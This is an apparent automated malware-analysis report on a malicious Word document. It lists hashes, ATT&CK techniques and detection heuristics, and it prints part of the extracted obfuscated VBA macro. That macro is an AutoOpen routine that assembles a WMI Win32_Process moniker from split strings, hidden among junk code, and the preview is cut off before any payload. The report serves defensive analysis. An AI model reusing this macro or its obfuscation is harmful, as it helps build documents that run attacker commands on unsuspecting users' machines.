Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e22419b24abf50f5…

MALICIOUS

Office (OLE)

Size: 145.9 KB
Created: 2019-05-01 12:11:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 10eb0d359d97da949d83ff24e2e4dbe9
SHA-1: 5e79614386f77db57198b5c22fcc5da31f254b48
SHA-256: e22419b24abf50f5e0895a22b94034dcb8b4d29d89edbb20814947719bd0e20b
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The macros use GetObject and CreateObject to reach the 'Win32_Process' WMI class through the 'winmgmts' moniker, a technique often used to execute arbitrary commands or download additional payloads. Obfuscating 'winmgmts' by splitting it across concatenated string literals is a common evasion tactic. No specific family could be identified, but the behaviour indicates a downloader.

Heuristics (8)

  • ClamAV: Doc.Downloader.00536d-6959611-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6959611-0
  • VBA macros detected [medium; 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro present.
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call present.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 22195 bytes
SHA-256: 2bd5240fffe083c0a83dc44edd1c0e50842afc9bb7c0de2a9ea7835580f81078

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "MADQAZBX"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "zA_GcBBC"
Attribute VB_Base = "0{E5FABED2-5D09-470B-AB68-4DE1B02D2F08}{C296A562-7B4E-476A-8752-2E5E5EBF083F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lAZoQGB"

Attribute VB_Name = "jGDAwAA"

Attribute VB_Name = "aAAXxQAo"

Attribute VB_Name = "BxABBwA"

Attribute VB_Name = "zCA_U1A"
Attribute VB_Base = "0{860FD737-E3D9-4B12-83F4-26073074266A}{6430A8A0-A2EC-47F2-A4A7-D1F0E89475C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "rZAxCUB"
Function K_QDQDD(CQCAA_)
   Select Case GAA4xoA
Case 562220402
Minute CInt(172368050 _
- Tan(iDxQk_AA * Cos(vUADA_) + _
612781366 + 928404273))
End Select
   Select Case nAxwCA1
Case 722578661
Minute CInt(217345090 _
- Tan(sAGDBUAA * Cos(IAAAAUA) + _
609068523 + 878158039))
End Select
   Select Case F_AADAQ
Case 504802116
Minute CInt(269409384 _
- Tan(VGABZAQU * Cos(joU1BBk) + _
285758612 + 495812894))
End Select
Set K_QDQDD = CVar(CQCAA_)
   Select Case joXGAQ
Case 642372825
Minute CInt(857527804 _
- Tan(cADGAA * Cos(UCXcAAAA) + _
265654494 + 540685068))
End Select
   Select Case SC4AAow
Case 20847050
Minute CInt(986330889 _
- Tan(Rw4UAA * Cos(nCAGUQ) + _
269843009 + 574981606))
End Select
   Select Case sUBAAAB4
Case 455227288
Minute CInt(253047170 _
- Tan(vA_UAB * Cos(zAcwQwUA) + _
933209543 + 74908986))
End Select
End Function
Sub autoopen()
   Select Case KAAXAZ
Case 642497119
Minute CInt(181703225 _
- Tan(JGxAA4cc * Cos(hAxkGDAc) + _
664103252 + 685957492))
End Select
   Select Case XGG4GD
Case 703799256
Minute CInt(81578945 _
- Tan(U1UAAAQ * Cos(CBAX4Bx) + _
909336882 + 617387229))
End Select
   Select Case A_AACA
Case 900650784
Minute CInt(241955921 _
- Tan(fo1AA_DA * Cos(JUUxAc) + _
573758774 + 653526745))
End Select
Call KwQQAX
   Select Case b4kZ4wD_
Case 705372864
Minute CInt(57839682 _
- Tan(DU_XAA * Cos(aAAGcGZD) + _
830160224 + 203800841))
End Select
   Select Case qDAAA14
Case 395176598
Minute CInt(931474604 _
- Tan(m_cQUA * Cos(iABBBG) + _
272367672 + 425762302))
End Select
   Select Case lUA1A1A
Case 73545898
Minute CInt(435462980 _
- Tan(CAAADAAo * Cos(qAAwXGAA) + _
852514816 + 45840680))
End Select
End Sub


Attribute VB_Name = "FCxXwA"
Function KwQQAX()
On Error Resume Next
   Select Case FDcABxUC
Case 626636184
Minute CInt(531242096 _
- Tan(qoAAA1xA * Cos(cAUADkA) + _
616431418 + 553143818))
End Select
   Select Case DGwAkxA
Case 779757640
Minute CInt(689477681 _
- Tan(qDAAAo_ * Cos(KUAG_B1A) + _
853526271 + 339676429))
End Select
   Select Case bAUBDBG
Case 533436387
Minute CInt(957147201 _
- Tan(rAGoUwQA * Cos(qAQBXG) + _
538258994 + 562243367))
End Select
Set VcAAXDD = K_QDQDD(GetObject("w" + "inmgmts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case KDXAXDC
Case 201267541
Minute CInt(345682419 _
- Tan(LU_AQ1 * Cos(dCXAxoA) + _
792458517 + 442369741))
End Select
   Select Case QAAAwA4
Case 683066449
Minute CInt(563040337 _
- Tan(oAAADDAQ * Cos(aAAU1UxB) + _
656105962 + 858600647))
End Select
EwU_AA = vbError - vbError
   Select Case l1wAoDD
Case 780749121
Minute CInt(382246454 _
- Tan(HoACUA * Cos(YBAABABw) + _
263297230 + 64874686))
End Select
   Select Case KCAwCAAx
Case 678107768
Minute CInt(396623115 _
- Tan(oBAAUAkA * Cos(dZwQADwB) + _
910934091 + 957431707))
End Select
   Select Case NQAUBU
Case 939437504
Minute CInt(530405962 _
- Tan(oQ
... (truncated)